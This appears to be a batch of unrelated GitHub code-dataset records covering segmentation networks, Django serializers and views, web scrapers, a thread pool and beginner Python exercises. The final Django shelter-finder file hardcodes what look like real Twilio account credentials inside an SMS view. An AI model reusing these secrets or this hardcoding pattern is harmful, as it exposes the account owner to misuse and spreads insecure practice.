x)\nplt.show()","repo_name":"DevMajed/Passive-Sonar-Demonstration-System","sub_path":"testing/localiztion_test.py","file_name":"localiztion_test.py","file_ext":"py","file_size_in_byte":1753,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"71742219940","text":"import torch\nfrom torch.functional import unique\nimport torch.nn as nn\nfrom torch.nn import functional as F\n\ndef get_syncbn():\n #return nn.BatchNorm2d\n return nn.SyncBatchNorm\n\ndef resize(input,\n size=None,\n scale_factor=None,\n mode='nearest',\n align_corners=None):\n return F.interpolate(input, size, scale_factor, mode, align_corners)\n\n\nclass Upsample(nn.Module):\n\n def __init__(self,\n size=None,\n scale_factor=None,\n mode='nearest',\n align_corners=None):\n super(Upsample, self).__init__()\n self.size = size\n if isinstance(scale_factor, tuple):\n self.scale_factor = tuple(float(factor) for factor in scale_factor)\n else:\n self.scale_factor = float(scale_factor) if scale_factor else None\n self.mode = mode\n self.align_corners = align_corners\n\n def forward(self, x):\n if not self.size:\n size = [int(t * self.scale_factor) for t in x.shape[-2:]]\n else:\n size = self.size\n return resize(x, size, None, self.mode, self.align_corners)\n\nclass PSPModule(nn.Module):\n \"\"\"\n Reference:\n Zhao, Hengshuang, et al. *\"Pyramid scene parsing network.\"*\n \"\"\"\n def __init__(self, features, out_features=512, sizes=(1, 2, 3, 6), norm_layer=nn.BatchNorm2d):\n super(PSPModule, self).__init__()\n self.stages = []\n self.stages = nn.ModuleList([self._make_stage(features, out_features, size, norm_layer) for size in sizes])\n self.bottleneck = nn.Sequential(\n nn.Conv2d(features+len(sizes)*out_features, out_features, kernel_size=1, padding=1, dilation=1, bias=False),\n norm_layer(out_features),\n nn.ReLU(),\n nn.Dropout2d(0.1)\n )\n\n def _make_stage(self, features, out_features, size, norm_layer):\n prior = nn.AdaptiveAvgPool2d(output_size=(size, size))\n conv = nn.Conv2d(features, out_features, kernel_size=1, bias=False)\n bn = norm_layer(out_features)\n return nn.Sequential(prior, conv, bn)\n\n def forward(self, feats):\n h, w = feats.size(2), feats.size(3)\n priors = [F.upsample(input=stage(feats), size=(h, w), mode='bilinear', align_corners=True) for stage in self.stages] + [feats]\n bottle = self.bottleneck(torch.cat(priors, 1))\n return bottle\n\n\n\nclass ASPP(nn.Module):\n \"\"\"\n Reference:\n Chen, Liang-Chieh, et al. *\"Rethinking Atrous Convolution for Semantic Image Segmentation.\"*\n \"\"\"\n def __init__(self, in_planes, inner_planes=256, sync_bn=False, dilations=(12, 24, 36)):\n super(ASPP, self).__init__()\n\n norm_layer = get_syncbn() if sync_bn else nn.BatchNorm2d\n self.conv1 = nn.Sequential(nn.AdaptiveAvgPool2d((1, 1)),\n nn.Conv2d(in_planes, inner_planes, kernel_size=1, padding=0, dilation=1, bias=False),\n norm_layer(inner_planes),\n nn.ReLU(inplace=True))\n self.conv2 = nn.Sequential(nn.Conv2d(in_planes, inner_planes, kernel_size=1, padding=0, dilation=1, bias=False),\n norm_layer(inner_planes),\n nn.ReLU(inplace=True))\n self.conv3 = nn.Sequential(nn.Conv2d(in_planes, inner_planes, kernel_size=3,\n padding=dilations[0], dilation=dilations[0], bias=False),\n norm_layer(inner_planes),\n nn.ReLU(inplace=True))\n self.conv4 = nn.Sequential(nn.Conv2d(in_planes, inner_planes, kernel_size=3,\n padding=dilations[1], dilation=dilations[1], bias=False),\n norm_layer(inner_planes),\n nn.ReLU(inplace=True))\n self.conv5 = nn.Sequential(nn.Conv2d(in_planes, inner_planes, kernel_size=3,\n padding=dilations[2], dilation=dilations[2], bias=False),\n norm_layer(inner_planes),\n nn.ReLU(inplace=True))\n\n self.out_planes = (len(dilations) + 2) * inner_planes\n\n def get_outplanes(self):\n return self.out_planes\n\n def forward(self, x):\n _, _, h, w = x.size()\n feat1 = F.upsample(self.conv1(x), size=(h, w), mode='bilinear', align_corners=True)\n feat2 = self.conv2(x)\n feat3 = self.conv3(x)\n feat4 = self.conv4(x)\n feat5 = self.conv5(x)\n aspp_out = torch.cat((feat1, feat2, feat3, feat4, feat5), 1)\n return aspp_out\n\n","repo_name":"hzhupku/IFA","sub_path":"pyseg/models/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":4690,"program_lang":"python","lang":"en","doc_type":"code","stars":64,"dataset":"github-code","pt":"35"} +{"seq_id":"75082359460","text":"from rest_framework import serializers\nfrom theBlog import models\nfrom django.contrib import messages\nfrom .users import UserSerializer\n\nclass Base64ImageField(serializers.ImageField):\n def to_internal_value(self, data):\n from django.core.files.base import ContentFile\n import base64\n import six\n import uuid\n\n # Check if this is a base64 string\n if isinstance(data, six.string_types):\n # Check if the base64 string is in the \"data:\" format\n if 'data:' in data and ';base64,' in data:\n # Break out the header from the base64 content\n header, data = data.split(';base64,')\n\n # Try to decode the file. Return validation error if it fails.\n try:\n decoded_file = base64.b64decode(data+'==')\n except TypeError:\n self.fail('invalid_image')\n\n # Generate file name:\n file_name = str(uuid.uuid4())[:12] # 12 characters are more than enough.\n # Get the file name extension:\n file_extension = self.get_file_extension(file_name, decoded_file)\n\n complete_file_name = \"%s.%s\" % (file_name, file_extension, )\n\n data = ContentFile(decoded_file, name=complete_file_name)\n\n return super(Base64ImageField, self).to_internal_value(data)\n\n def get_file_extension(self, file_name, decoded_file):\n import imghdr\n\n extension = imghdr.what(file_name, decoded_file)\n extension = \"jpg\" if extension == \"jpeg\" else extension\n\n return extension\n\nclass CategorySerializer(serializers.ModelSerializer):\n class Meta:\n model = models.Category\n fields = ['category_name']\n \n\nclass PostSerializer(serializers.ModelSerializer):\n author = UserSerializer(read_only=True)\n header_image = Base64ImageField(\n max_length=None, use_url=True,required=False,allow_null=True,\n )\n class Meta:\n model = models.Post\n fields = ['author','title','post_Video','title_tag','category_name','header_image','body','created','total_likes']\n extra_kwargs = {'total_likes':{'read_only':True}}\n \n def create(self, validated_data):\n validated_data['author'] = self.context['request'].user\n title = self.context['request'].data['title_tag']\n instance = models.Post.objects.create(**validated_data)\n instance.set_title_tag(title)\n messages.success(self.context['request'],'New Post Has Been Created.')\n return instance\n\n\nclass PostSerializerDetail(serializers.ModelSerializer):\n author = UserSerializer(read_only=True)\n header_image = Base64ImageField(\n max_length=None, use_url=True,required=False,allow_null=True,\n )\n class Meta:\n model = models.Post\n fields = ['author','title','title_tag','category_name','post_Video','header_image','body','created','total_likes']\n extra_kwargs = {'author': {'read_only': True},'total_likes': {'read_only': True},'title':{'read_only': True},'title_tag':{'read_only': True}}\n \n \n def update(self,instance, validated_data):\n messages.success(self.context['request'],'Post Has Been Updated.')\n if 'category_name' in validated_data:\n instance.category_name = validated_data['category_name']\n if 'header_image' in validated_data:\n instance.header_image = validated_data['header_image']\n if 'post_Video' in validated_data:\n instance.post_Video = validated_data['post_Video']\n if 'title_tag' in self.context['request'].data:\n print(\"title_tag\")\n instance.set_title_tag(self.context['request'].data['title_tag'])\n if 'body' in validated_data:\n instance.body=validated_data['body']\n return instance\n","repo_name":"iMu21/MyBlog-API","sub_path":"theBlog/serializers/blogs.py","file_name":"blogs.py","file_ext":"py","file_size_in_byte":3801,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"43570511809","text":"import pandas as pd\r\nimport numpy as np\r\n\r\n\r\nclass Strategy:\r\n\r\n def __init__(self, hard=None, soft=None, src_hard=None, src_soft=None):\r\n # Get strategy table for player not having a usable ace\r\n if src_hard is not None:\r\n self.hard = pd.read_csv(src_hard, index_col=0).values\r\n elif hard is not None:\r\n self.hard = hard\r\n else:\r\n # Initialize table and set last row (player's sum is 21) to all 0s (=stick)\r\n self.hard = np.zeros((18, 10), dtype=np.int8)\r\n self.hard[:-1, :] = 0\r\n # Get strategy table for player having a usable ace\r\n if src_soft is not None:\r\n self.soft = pd.read_csv(src_soft, index_col=0).values\r\n elif soft is not None:\r\n self.soft = soft\r\n else:\r\n # Initialize table and set last row (player's sum is 21) to all 0s (=stick)\r\n self.soft = np.zeros((10, 10), dtype=np.int8)\r\n self.soft[:-1, :] = 0\r\n\r\n def action(self, players_sum, dealers_card, usable_ace):\r\n # Read action from strategy table\r\n if usable_ace:\r\n return self.soft[min(players_sum - 12, 9), dealers_card - 1]\r\n else:\r\n return self.hard[min(players_sum - 4, 17), dealers_card - 1]\r\n\r\n def match(self, strategy_compare):\r\n # Get strategy tables\r\n tables = np.concatenate([self.hard, self.soft])\r\n tables_compare = np.concatenate([strategy_compare.hard, strategy_compare.soft])\r\n # Iterate over indices\r\n sum_match = 0\r\n for i in range(tables.shape[0]):\r\n for j in range(tables.shape[1]):\r\n values = {tables[i, j], tables_compare[i, j]}\r\n # If primary and secondary action are equal, add 1 to comparisons\r\n if len(values) == 1:\r\n sum_match += 1\r\n # If only one of them matches the other, add 0.5\r\n elif values == {2, 4} or values == {3, 6}:\r\n sum_match += 0.5\r\n elif values == {0, 2} or values == {0, 3} or values == {1, 4} or values == {1, 6}:\r\n sum_match += 0.5\r\n elif values == {2, 3} or values == {4, 6}:\r\n sum_match += 0.5\r\n # Return the mean of comparisons\r\n return sum_match / tables.size\r\n\r\n def output(self, target_hard=None, target_soft=None):\r\n # Store string data in dictionaries\r\n data_hard, data_soft = {}, {}\r\n symbols = {0: 'S', 1: 'H', 2: 'DS', 3: 'RS', 4: 'DH', 6: 'RH'}\r\n for dealers_card in range(1, 10):\r\n column_name = 'A' if dealers_card == 1 else '{:02d}'.format(dealers_card)\r\n data_hard[column_name] = [symbols[a] for a in self.hard[:, dealers_card - 1]]\r\n data_soft[column_name] = [symbols[a] for a in self.soft[:, dealers_card - 1]]\r\n # Create pandas data frames from dictionaries\r\n df_hard = pd.DataFrame(data_hard, index=['{:02d}'.format(c) for c in range(4, 22)])\r\n df_soft = pd.DataFrame(data_soft, index=range(12, 22))\r\n # Print data frames\r\n print('Hard:\\n{}\\n\\nSoft:\\n{}'.format(df_hard.to_string(), df_soft.to_string()))\r\n # Export data frames to csv files\r\n if target_hard is not None:\r\n df_hard.to_csv(target_hard)\r\n if target_soft is not None:\r\n df_soft.to_csv(target_soft)\r\n","repo_name":"carlosgoe/blackjack-rl","sub_path":"blackjack_strategy.py","file_name":"blackjack_strategy.py","file_ext":"py","file_size_in_byte":3406,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"27146125009","text":"'''\nCreate a function named EVEN that will take 2 int parameters.\none for starting point and the other is a counter.\nreturn a list of counter smallest even int\ngreater than or equal to starting point in ascending order\n'''\n\n\ndef even(start, times):\n\n numList =[]\n\n for i in range(start, start+times*2):\n if i%2==0:\n numList.append(i)\n print(numList)\n\ndef even2(start, n):\n if start%2 == 0:\n start = start\n else:\n start = start + 1\n\n newList = []\n i = 0\n while i < n:\n newList.append(start)\n start = start +2\n i = i+1\n print(newList)\n\neven(2,3)\neven2(2,3)\n\n\n# if __name__ == '__main__':\n# even(2,3)\n# even2(2,3)\n\n\n\n","repo_name":"eminegit/homeworkNov30","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"27521318168","text":"import http.client\nimport urllib.parse\n\n\nclass Request:\n content = ''\n status = ''\n reason = ''\n host = '172.20.204.65:81'\n headers = {'Content-type': 'application/x-www-form-urlencoded',\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',\n 'Upgrade-Insecure-Requests': '1',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)',\n }\n error = ''\n\n def httpSend(self, req):\n if not self.checkReq(req):\n return False\n\n url = req['url']\n post = 'post' in req and req['post'] or ''\n\n coon = http.client.HTTPConnection(self.host)\n if post:\n post = self.parsePost(post)\n params = urllib.parse.urlencode(post)\n coon.request('POST', url, params, headers=self.headers)\n else:\n coon.request('GET', url, headers=self.headers)\n response = coon.getresponse()\n self.status = response.status\n self.reason = response.reason\n self.content = response.read()\n coon.close()\n\n def isConnectSuccess(self):\n return self.status == 200\n\n def getContent(self):\n return self.content\n\n def checkReq(self, req):\n if 'url' not in req:\n self.error = '请求url错误'\n return False\n else:\n return True\n\n def reset(self):\n self.content = ''\n self.status = ''\n self.reason = ''\n self.error = ''\n\n @staticmethod\n def parsePost(params):\n if not params:\n return None\n\n if isinstance(params, dict):\n return params\n\n post = {}\n paramsArr = params.split('&')\n for rq in paramsArr:\n poz = rq.find('=')\n name = rq[0:poz]\n content = rq[poz + 1:]\n post[name] = content\n\n return post\n\n","repo_name":"bafnmhm/api-tester","sub_path":"inc/Request.py","file_name":"Request.py","file_ext":"py","file_size_in_byte":1939,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"70704958822","text":"def solution(s):\n answer = 1001\n if len(s) == 1:\n return 1\n for leng in range(1, len(s)//2+1):\n s_copy = s\n madeStrings = []\n while s_copy:\n sliced = s_copy[:leng]\n s_copy = s_copy[leng:]\n if madeStrings:\n if madeStrings[-1][1] == sliced:\n madeStrings[-1][0] += 1\n else:\n madeStrings.append([1, sliced])\n else:\n madeStrings.append([1, sliced])\n curLenAnswer = 0\n for element in madeStrings:\n curLenAnswer += len(element[1]) + (element[0] > 1) * len(str(element[0]))\n answer = min(answer, curLenAnswer)\n return answer","repo_name":"dohyun93/python_playground","sub_path":"section12_(유형)_구현 문제들/12-3.문자열 압축(카카오2020).py","file_name":"12-3.문자열 압축(카카오2020).py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"11544837858","text":"from marshmallow import Schema, fields, post_load\nfrom typing import Any, Dict, Iterable, List, Optional, Set\nfrom .base import Base\n\n\nclass Table(Base):\n TYPE = 'table'\n\n def __init__(self, *,\n name: str,\n key: str,\n description: str,\n cluster: str,\n database: str,\n schema_name: str,\n column_names: Iterable[str],\n column_descriptions: List[str] = [],\n tags: Iterable[str],\n last_updated_epoch: int,\n display_name: Optional[str] = None,\n total_usage: int = 0) -> None:\n self.name = name\n self.key = key\n self.description = description\n self.cluster = cluster\n self.database = database\n self.schema_name = schema_name\n self.column_names = column_names\n self.tags = tags\n self.last_updated_epoch = last_updated_epoch\n self.total_usage = total_usage\n self.column_descriptions = column_descriptions\n self.display_name = display_name\n\n def get_id(self) -> str:\n # uses the table key as the document id in ES\n return self.key\n\n @classmethod\n def get_attrs(cls) -> Set:\n return {\n 'name',\n 'key',\n 'description',\n 'cluster',\n 'database',\n 'schema_name',\n 'column_names',\n 'tags',\n 'last_updated_epoch',\n 'display_name'\n }\n\n def __repr__(self) -> str:\n return 'Table(name={!r}, key={!r}, description={!r}, ' \\\n 'cluster={!r} database={!r}, schema_name={!r}, column_names={!r}, ' \\\n 'tags={!r}, last_updated={!r}, display_name={!r})'.format(self.name,\n self.key,\n self.description,\n self.cluster,\n self.database,\n self.schema_name,\n self.column_names,\n self.tags,\n self.last_updated_epoch,\n self.display_name)\n\n\nclass TableSchema(Schema):\n database = fields.Str()\n cluster = fields.Str()\n column_names = fields.List(fields.Str())\n schema_name = fields.Str()\n name = fields.Str()\n key = fields.Str()\n description = fields.Str()\n last_updated_epoch = fields.Str(allow_none=True)\n tags = fields.List(fields.Str())\n total_usage = fields.Int(allow_none=True)\n column_descriptions = fields.List(fields.Str(), allow_none=True)\n display_name = fields.Str(allow_none=True)\n\n @post_load\n def make(self, data: Dict[str, Any], **kwargs: Any) -> Table:\n return Table(**data)\n","repo_name":"metadataxpress/metadataxpress","sub_path":"amundsensearchlibrary/search_service/models/table.py","file_name":"table.py","file_ext":"py","file_size_in_byte":3219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"37966106663","text":"import urllib.request\nimport urllib.error\n\nif __name__ == '__main__':\n # url = \"http://163.204.244.8\"\n # url = \"http://blog.csdn.net\"\n url =\"https://www.bsssaidu.com\"\n try:\n urllib.request.urlopen(url)\n except urllib.error.URLError as e:\n if hasattr(e, \"code\"):\n print(e.code)\n if hasattr(e, \"reason\"):\n print(e.reason)","repo_name":"youxi0011983/python_study","sub_path":"crawler/DemoURLError2.py","file_name":"DemoURLError2.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"10029956324","text":"import psycopg2\nfrom matplotlib import pyplot as plt\nimport configparser\n\n\nconfig = configparser.ConfigParser()\nconfig.read('dwh.cfg')\nconnect = psycopg2.connect(\"host={} dbname={} user={} password={} port={}\".format(*config['CLUSTER'].values()))\ncursor = connect.cursor()\n\ntry:\n cursor.execute(\"SELECT COUNT(level) FROM users WHERE level = 'free'\")\n\nexcept psycopg2.Error as e:\n print(\"Error: select *\")\n print(e)\nno_free_users = cursor.fetchone()[0]\n\n# Get number of paid users\ntry:\n cursor.execute(\"SELECT COUNT(level) FROM users WHERE level = 'paid'\")\nexcept psycopg2.Error as e:\n print(\"Error: select *\")\n print(e)\nno_paid_users = cursor.fetchone()[0]\n\n# Get number of Male users\ntry:\n cursor.execute(\"SELECT COUNT(*) FROM users WHERE gender = 'M'\")\n\nexcept psycopg2.Error as e:\n print(\"Error: select *\")\n print(e)\nno_male_users = cursor.fetchone()[0]\n\n# Get number of Female users\ntry:\n cursor.execute(\"SELECT COUNT(*) FROM users WHERE gender = 'F'\")\n\nexcept psycopg2.Error as e:\n print(\"Error: select *\")\n print(e)\nno_female_users = cursor.fetchone()[0]\n\nconnect.close()\n\n# Plotting\nuser_level = [\"Free\", \"Paid\"]\nuser_gender = [\"Male\", \"Female\"]\ndata_level = [no_free_users, no_paid_users]\ndata_gender = [no_male_users, no_female_users]\nplot_data_level = data_level\nplot_data_gender = data_gender\nprint(data_level)\nprint(data_gender)\n\n# Creating plot\nfig = plt.figure(figsize=(10, 10))\nax = fig.add_axes([0, 0, 1, 1])\nfig1 = plt.figure(figsize=(10, 10))\nax1 = fig1.add_axes([0, 0, 1, 1])\n\nax.pie(plot_data_level,\n labels=user_level,\n autopct='%1.1f%%')\nax1.pie(plot_data_gender,\n labels=user_gender,\n autopct='%1.1f%%')\nax.set_title(\"Users Level\", fontsize=20)\nax1.set_title(\"Users Gender\", fontsize=20)\n\n# show plot\nplt.show()\n","repo_name":"xzbits/project3_DE_ND","sub_path":"dashboard_users_insight.py","file_name":"dashboard_users_insight.py","file_ext":"py","file_size_in_byte":1797,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"43927122453","text":"import requests\nfrom bs4 import BeautifulSoup\nimport csv\nimport os\n\nURL = 'https://auto.ria.com/newauto/marka-chery/'\nHEADERS = {\n 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36',\n 'accept': '*/*'}\nHOST = 'https://auto.ria.com'\nFILE = 'cars.csv'\n\n\ndef get_html(url, params=None):\n r = requests.get(url, headers=HEADERS, params=params)\n return r\n\n\ndef get_content(html):\n soup = BeautifulSoup(html, 'html.parser')\n items = soup.find_all('div', class_='proposition')\n cars = []\n for item in items:\n cars.append({\n 'title': item.find('h3', class_='proposition_name').get_text(strip=True),\n 'link': HOST + item.find('a').get('href'),\n 'usd_price': item.find('span', class_='green').get_text(strip=True),\n })\n return cars\n\n\ndef get_pages_count(html):\n soup = BeautifulSoup(html, 'html.parser')\n pagination = soup.find_all('span', class_='mhide')\n if pagination:\n return int(pagination[-1].get_text())\n return 1\n\n\ndef save_in_file(items, path):\n with open(path, 'w', newline='') as file:\n writer = csv.writer(file, delimiter=';')\n writer.writerow({'Mark', 'Link', 'Price(USD)'})\n for item in items:\n writer.writerow([item['title'], item['link'], item['usd_price']])\n\n\ndef parse():\n URL = input('Input URL: ')\n html = get_html(URL) #if 200 then allright\n if html.status_code == 200:\n cars = []\n pages_count = get_pages_count(html.text)\n for page in range(1, pages_count + 1):\n print(f'Parse pages: {page} of {pages_count}')\n html = get_html(URL, params={'page': page})\n cars.extend(get_content(html.text))\n save_in_file(cars, FILE)\n print(f'Get {len(cars)} auto.')\n os.startfile(FILE)\n else:\n print('Error: status_code.')\n\n\nparse()\n","repo_name":"dimmarvel/parsers_","sub_path":"python parsers/auto.ria/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":1930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"41836338748","text":"import scrapy\nfrom random import uniform\nfrom time import sleep\n\n\nclass SpiderkolesaSpider(scrapy.Spider):\n name = 'spiderkolesa'\n allowed_domains = ['kolesa.kz']\n start_urls = ['https://kolesa.kz/cars/']\n\n def parse(self, response):\n for i in range(1, 1000):\n url = f'https://kolesa.kz/cars/?page={i}'\n yield scrapy.Request(url, callback=self.parse_page)\n\n def parse_page(self, response):\n for href in response.css(\".ddl_product_link::attr('href')\"):\n url = response.urljoin(href.extract())\n sleep(round(uniform(0.2, 0.4), 3))\n yield scrapy.Request(url, callback=self.parse_contents)\n\n def parse_contents(self, response):\n item = dict()\n item['manufacturer'] = response.css('h1 span::text').get().strip()\n item['model'] = response.css('h1 span::text').getall()[1].strip()\n item['year'] = response.css('.year::text').get().strip()\n item['city'] = response.css('dl:nth-child(1) .value::text').get().strip()\n item['body'] = response.css('dl:nth-child(2) .value::text').get().strip()\n item['engine_volume'] = response.css('dl:nth-child(3) .value::text').get().strip()\n item['mileage'] = response.css('dl:nth-child(4) .value::text').get().strip()\n item['transmission'] = response.css('dl:nth-child(5) .value::text').get().strip()\n item['wheel'] = response.css('dl:nth-child(6) .value::text').get().strip()\n item['color'] = response.css('dl:nth-child(7) .value::text').get().strip()\n item['drive'] = response.css('dl:nth-child(8) .value::text').get().strip()\n item['price'] = response.css('.offer__price::text').get().strip()\n yield item\n","repo_name":"Almas-Alz/kolesakz-parser","sub_path":"spiderkolesa.py","file_name":"spiderkolesa.py","file_ext":"py","file_size_in_byte":1718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"15566670220","text":"# from random import randint\n\n\n# n = 6\n# c = 1 \n\n# while c!=n:\n# print(c )\n# print(\"*\" * c)\n# # c = c + 1\n# c += 1 \n\n\n# n = int(input(\"Introduceti inaltimea bradului dorit: \"))\n# c = 1 \n\n# while c!=n:\n# # print(c )\n# print(\"*\" * c)\n# # c = c + 1\n# c += 1 \n\n\n# numar_rand = randint (1, 99)\n\n# print(\"Incepe jocul!\")\n# numar = int(input(\"Ghiceste numarul intre 1-99 :\"))\n# while numar != numar_rand:\n# if numar > numar_rand:\n# print (\"-\")\n# else:\n# print (\"+\")\n# numar = int(input(\"Introdu un numar:\"))\n\n# print (\"Ai castigat\")\n\n# r1 = range(10)\n\n# for i in r1:\n# print(i)\n\ncounter = 0\n\nr5 = range(0, 6, 2)\nfor counter in r5:\n counter += 1\n\nprint (counter)\n\n\n","repo_name":"NorbertDozsa/It_Scchool-2023","sub_path":"Sessions/S4/Ex while.py","file_name":"Ex while.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"29053195042","text":"class Solution:\n def uniquePaths(self, m: int, n: int) -> int:\n matrix = [[1] * n for _ in range(m)]\n\n for r in range(1, len(matrix)):\n for c in range(1, len(matrix[0])):\n matrix[r][c] = matrix[r-1][c] + matrix[r][c-1]\n\n return matrix[-1][-1]\n\n\n# Time: O(m*n)\n# Space: O(m*n)\n","repo_name":"kutaycinar/leetcode","sub_path":"python/62_unique-paths.py","file_name":"62_unique-paths.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"23444104000","text":"# -*- encoding:utf-8 -*-\n\nimport psutil\nimport threading\nfrom operating_system.task import Task, AsyncTask\nfrom operating_system.ThreadSafeQueue import ThreadSafeQueue\n\n\nclass ProcessThread(threading.Thread):\n\n def __init__(self, task_queue, *args, **kwargs):\n threading.Thread.__init__(self)\n self.task_queue = task_queue\n self.dismiss_flag = threading.Event()\n self.args = args\n self.kwargs = kwargs\n\n def run(self):\n while True:\n if self.dismiss_flag.is_set():\n break\n task = self.task_queue.pop()\n if not isinstance(task, Task):\n continue\n result = task.callable(*task.args, **task.kwargs)\n if isinstance(task, AsyncTask):\n task.set_result(result)\n\n def dismiss(self):\n self.dismiss_flag.set()\n\n def stop(self):\n self.dismiss()\n\n\nclass ThreadPool:\n\n def __init__(self, size=0):\n if not size:\n size = psutil.cpu_count() * 2\n self.task_queue = ThreadSafeQueue(size)\n self.pool = ThreadSafeQueue()\n for i in range(size):\n self.pool.put(ProcessThread(self.task_queue))\n\n def start(self):\n for i in range(self.size()):\n thread = self.pool.get(i)\n thread.start()\n\n def join(self):\n for i in range(self.size()):\n thread = self.pool.get(i)\n thread.stop()\n\n def put(self, item):\n if not isinstance(item, Task):\n raise TaskTypeError()\n self.task_queue.put(item)\n\n def batch_put(self, item_list):\n if not isinstance(item_list, list):\n item_list = list(item_list)\n for item in item_list:\n self.put(item)\n\n def size(self):\n return self.pool.size()\n\n\nclass TaskTypeError(Exception):\n pass\n","repo_name":"iqer/computer_composition","sub_path":"operating_system/pool.py","file_name":"pool.py","file_ext":"py","file_size_in_byte":1844,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"30582575708","text":"import pandas as pd\n\n\ndef preprocess_data(path):\n \"\"\"\n Preprocess dataset stored in the following `path`\n\n Parameters:\n ----------\n path: str\n path to the dataset directory.\n\n Return:\n ------\n df: pandas DataFrame\n Preprocessed dateset.\n \"\"\"\n df = pd.read_csv(path, parse_dates=[\"Date\"])\n df.fillna(\"None\", inplace=True)\n df = (df.query(\"Target == 'ConfirmedCases'\")\n .query(\"TargetValue >= 0\"))\n df.drop([\"Id\", \"Target\"], axis=1, inplace=True)\n df.rename(columns={\"TargetValue\": \"Infected\"}, inplace=True)\n df.columns = map(str.lower, df.columns)\n\n return df","repo_name":"Venzel13/ML","sub_path":"COVID-19/preproc.py","file_name":"preproc.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"30313556970","text":"from .models import Shelter\nfrom users.models import CustomUser\nfrom django.http import JsonResponse\nfrom users.views import tokens\nfrom django.http import JsonResponse\nfrom geopy.distance import geodesic\nimport json\nfrom twilio.rest import Client\nfrom django.views.decorators.csrf import csrf_exempt\n\n\n\ndef return_shelters(request):\n\n if request.method == 'GET':\n # Check token.\n if \"Authorization\" not in request.headers or request.headers[\"Authorization\"] not in tokens:\n return JsonResponse({\"success\": False, \"error\": \"Invalid token\"})\n\n queryset = Shelter.objects.all()\n\n data_q = []\n\n for set in queryset:\n data = {\n \"name\": set.name,\n \"address\": set.address,\n \"capacity\": set.capacity,\n \"functionalities\": set.functionalities,\n \"latitude\": set.latitude,\n \"longitude\": set.longitude,\n \"type\": set.type\n }\n data_q.append(data)\n\n return JsonResponse({\"success\": True, \"safetyPlaces\": data_q})\n \n return JsonResponse({\"success\": False, \"error\": \"Bad request method\"})\n\ndef get_user(request):\n\n if request.method == \"GET\":\n # Check token.\n if \"Authorization\" not in request.headers or request.headers[\"Authorization\"] not in tokens:\n return JsonResponse({\"success\": False, \"error\": \"Invalid token\"})\n \n user = tokens[request.headers[\"Authorization\"]]\n return JsonResponse({\"success\": True, \"name\": user.name, \"email\": user.email, \"contact\": user.contact})\n \n return JsonResponse({\"success\": False, \"error\": \"Bad request method\"})\n\ndef shelter_list_view(request):\n\n if request.method == 'GET':\n range_data = json.loads(request.body.decode('utf-8'))\n latitude = range_data['latitude']\n longitude = range_data['longitude']\n range_km = range_data['range']\n\n user_location = (latitude, longitude)\n\n shelters = Shelter.objects.all()\n shelters_within_range = []\n\n for shelter in shelters:\n shelter_location = (shelter.latitude, shelter.longitude)\n dist = geodesic(user_location, shelter_location).km\n\n if dist <= range_km:\n shelters_within_range.append(shelter)\n\n shelter_data = [\n {\n \"name\": shelter.name,\n \"address\": shelter.address,\n \"capacity\": shelter.capacity,\n \"functionalities\": shelter.functionalities,\n \"latitude\": shelter.latitude,\n \"longitude\": shelter.longitude,\n \"type\": shelter.type\n }\n for shelter in shelters_within_range\n ]\n\n return JsonResponse({'shelters': shelter_data})\n \n return JsonResponse({\"success\": False, \"error\": \"Bad request method\"})\n \n \n@csrf_exempt\ndef emergency_sms(request):\n\n if request.method == 'POST':\n account_sid = 'AC75dfdabe82e41397a479a5686da9e540'\n auth_token = '1c3013ec7e42ae83b2ff34d321958aad'\n \n if \"Authorization\" not in request.headers or request.headers[\"Authorization\"] not in tokens:\n return JsonResponse({\"success\": False, \"error\": \"Invalid token\"})\n \n client = Client(account_sid, auth_token)\n data = json.loads(request.body.decode('utf-8'))\n msg_text = f\"{tokens[request.headers['Authorization']].name} is in need of urgent help!If you can't reach out to them, please dial the national emergency number and ask for immediate support! (lat. {str(data['latitude'])}, long. {str(data['latitude'])}\"\n \n message = client.messages.create(\n body=msg_text,\n from_='+12542564967',\n to=tokens[request.headers[\"Authorization\"]].contact\n )\n return JsonResponse({'success':True})\n\n return JsonResponse({\"success\": False, \"error\": \"Bad request method\"})\n\n@csrf_exempt\ndef add_friend(request):\n # Check method.\n if request.method == \"POST\":\n # Check token.\n if \"Authorization\" not in request.headers or request.headers[\"Authorization\"] not in tokens:\n return JsonResponse({\"success\": False, \"error\": \"Invalid token\"})\n \n # Check 